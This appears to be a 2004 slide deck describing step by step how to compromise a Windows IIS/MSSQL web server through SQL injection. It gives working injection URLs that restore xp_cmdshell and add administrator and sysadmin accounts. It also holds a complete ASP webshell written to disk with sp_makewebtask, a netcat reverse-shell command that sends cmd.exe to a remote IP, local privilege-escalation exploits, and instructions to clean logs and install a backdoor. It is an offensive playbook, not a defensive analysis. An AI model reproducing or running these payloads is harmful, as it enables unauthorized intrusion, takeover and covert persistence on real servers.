Thinking MSSQL SQL Injection

M$SQL Sql Injection Thinking
DM Wang
2004.10.16
Chroot Meeting
Thinking





1.scan sql injection target’s port 。
2.check service 。
3.if target have terminal service then use xp_cmdshell add
system account , if success then use T.S client connect to
target and login system 。
4.if you can connect to 1433 port then try to add sql server
manage account, if success then use sqlexec.exe connect to
target 。 5.if step 3 、 4 fail ， maybe xp_cmdshell has removed ， we
can use osql.exe and query analysis tool to test ， if
xp_cmdshell has removed ， we can chose recovery
xp_cmdshell ， recovery xp_cmdshell must have
xplog70.dll ， if target don’t have then you must upload
xplog70.dll to target ， in this case upfile must have a
webshell ， so you must write a webshell on the server ， this
step must know web site’s physical path 。
Thinking

6.when you upload webshell to target ， then you can use
webpage interface to execute command ， but just IIS privilege ， so must up privilege 。

7.up privilege

ms04019

ms04020

other program vulnerability

recovery xp_cmdshell then execute command

8.clean log 、 install backdoor
Port Scan
T.S
Sql
Web
xp_cmdshell
恢復 xp_cmdshell
Webshell
Port Scan

fscan -qp 1-5000 x.x.x.x
FScan v1.12 - Command line port scanner.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com

Scan started at Sat Sep 18 22:54:30 2004













x.x.x.x 22/tcp220 Serv-U FTP Server v5.0 for WinSock ready...
x.x.x.x 25/tcp
x.x.x.x 80/tcpMicrosoft-IIS/5.0
x.x.x.x 110/tcp
x.x.x.x 1025/tcp
x.x.x.x 1026/tcp
x.x.x.x 1029/tcp
x.x.x.x 1433/tcpSql Server
x.x.x.x 3372/tcp
x.x.x.x 3388/tcpTerminal Service
Sql Injection check


http://www.something.com/script.asp?id=2 and
1=1
IE return normal record 。
http://www.something.com/script.asp?id=2 and
1=2
IE not return normal record 。
be sure have Sql injection vulnerability!!
Other check
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294'
NBSI2
List directory: xp_dirtree 、 xp_subdirs
Execute command: xp_cmdshell
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294%
20and%201=(select%20@@VERSION)
Check xp_cmdshell
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294%20and%
201=(SELECT%20count(*)%20FROM%
20master.dbo.sysobjects%20WHERE%20xtype%20=%
20'X'%20AND%20name%20=%20'xp_cmdshell')
Recovery xp_cmdshell
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294;exec
%20master.dbo.sp_addextendedproc%
20'xp_cmdshell','xplog70.dll‘
Add system user ， connect to T.S


;exec master.dbo.xp_cmdshell 'net user
username password /add';-;exec master.dbo.xp_cmdshell 'net localgroup
administrators username /add';--
Local
Remote
T.S:3388
Create Webshell
1.Have sql injection
 2.Find Web’s physical Path



xp_regread
3.execute sp_makewebtask
Reference command




;create table temp(id nvarchar(255),num1 nvarchar(255),
num2 nvarchar(255),num3 nvarchar(255));-List all disk
 ;insert temp exec master.dbo.xp_availablemedia;-Get directory list
 ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-Get all directory structural
 ;insert into temp(id,num1) exec master.dbo.xp_dirtree
'c:\';--
Web’s physical Path D:\ChinaSC
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294;create table [dbo].
[cyfd] ([gyfd][char](255));
http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294;DECLARE @result
varchar(255) EXEC master.dbo.xp_regread
'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3
SVC\Parameters\Virtual Roots','/',@result output insert into cyfd
(gyfd) values(@result);-http://xxx.xxx.xxx.xxx/asp/zcfg/xs.asp?id=294 and 1=(select count
(*) from cyfd where gyfd >1)
sp_makewebtask (T-SQL)

Creates a task that produces an HTML
document containing data returned by
executed queries.
Create Webshell
exec sp_makewebtask @outputfile%3d'D:\ChinaSC\aacc.asp',@charset%
3dgb2312,@query%3d'select ''<%25On Error Resume Next : Set oscript %
3d Server.CreateObject("wscript.SHELL") : Set oscriptNet %3d
Server.CreateObject("wscript.NETWORK") : Set oFileSys %3d
Server.CreateObject("scripting.FileSystemObject") : szCMD %3d
Request.Form(".CMD") : If (szCMD <>"")Then : szTempFile %3d "C:\" %26
oFileSys.GetTempName() : Call oscript.Run ("cmd.exe /c " %26 szCMD %26
" > " %26 szTempFile, 0, True) : Set oFile %3d oFilesys.OpenTextFile
(szTempFile, 1, False, 0) End If %25> <HTML><BODY><FORM action%
3d"<%25%3d Request.ServerVariables("URL")%25>" method%3d"POST">
<input type%3dtext name%3d".CMD" size%3d45 value%3d"<%25%3d
szCMD %25>"><input type%3dsubmit value%3d"Run"> </FORM><PRE>
<%25 If (IsObject(oFile))Then : On Error Resume Next : Response.Write
Server.HTMLEncode(oFile.ReadAll) : oFile.Close : Call oFileSys.DeleteFile
(szTempFile, True) : End If%25> </BODY></HTML> '''
D:\ChinaSC\aacc.asp
Find xp.exe is nc.exe
Use xp.exe Connect back get Cmd shell
nc.exe –nvv –l –p port
Xp.exe –e cmd.exe ip port
Upload Tools
1.FTP
2.TFTP
3.Wget
4.Debug
5.Cscript Webdown.vbs
Up Privilege




Ms04019
Ms04020
Serv-U Local Exploit
Recovery xp_cmdshell
 Upload xplog70.dll
 C:\Inetpub\scripts\xplog70.dll
xplog70.dll default path
Add SQL Sysadmin user






Add SQL User
（ 1 ） http://www.xxx.com/new/new.asp?id=49;exec
master.dbo.sp_addlogin fmzm;-Set SQL Account:FMZM Password:FMZM
（ 2 ） http://www.xxx.com/new/new.asp?id=49;exec
master.dbo.sp_password null,fmzm,fmzm;-Add FMZM to sysadmin group
（ 3 ） http://www.xxx.com/new/new.asp?id=49;exec
master.dbo.sp_addsrvrolemember sysadmin fmzm;--
Use Sqlexec Connect
Use osq.exe and Query analysis Check
Query analysis
Execute Store Procedure
Delete xp_cmdshell





if exists (select * from
dbo.sysobjects where id = object_id(N'[dbo].
[xp_cmdshell]') and
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO
Create xp_cmdshell

exec master.dbo.sp_addextendedproc
'xp_cmdshell','c:\inetpub\scripts\xplog70.dll'
Succeed!!
Add System Account
Connect to T.S
Use xp_cmdshell execute nc.exe
Get System Privilege
Reference




http://www.cnhacker.cn/asp/list.asp?id=1909
http://computer.mblogger.cn/sprite/posts/14051.aspx
http://www.xfocus.net/articles/200406/712.html
http://www.77169.com/Article/Class5/Class12/Class20/
200410/12434.html